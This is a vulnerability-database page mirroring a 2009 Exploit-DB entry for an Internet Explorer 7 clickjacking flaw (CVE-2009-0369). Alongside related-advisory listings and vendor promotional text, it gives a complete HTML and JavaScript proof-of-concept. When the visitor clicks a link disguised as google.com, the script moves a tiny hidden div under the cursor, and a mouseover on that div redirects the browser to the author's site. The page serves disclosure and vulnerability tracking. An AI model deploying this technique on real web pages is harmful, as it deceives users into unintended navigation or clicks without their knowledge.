Lucene search
+L

Microsoft Internet Explorer 7 - Clickjacking

🗓️ 29 Jan 2009 00:00:00Reported by UzmiXType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Microsoft Internet Explorer 7 Clickjacking vulnerability in onMouseove

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-0369
29 Jan 200900:00
circl
CVE
CVE-2009-0369
30 Jan 200919:00
cve
Cvelist
CVE-2009-0369
30 Jan 200919:00
cvelist
NVD
CVE-2009-0369
30 Jan 200919:30
nvd
OpenVAS
Microsoft Internet Explorer Clickjacking Vulnerability
4 Feb 200900:00
openvas
OpenVAS
Microsoft Internet Explorer Clickjacking Vulnerability
4 Feb 200900:00
openvas
Prion
Spoofing
30 Jan 200919:30
prion
#############################################################
# Application Name       : İnternet Explorer 7
# Vulnerable Type        : Clickjacking
# Author                     : UzmiX
#############################################################
< ------------------- header data end of ------------------- >
<html>
<body>
<div id="open"
onmouseover="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

# milw0rm.com [2009-01-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jan 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.10627
36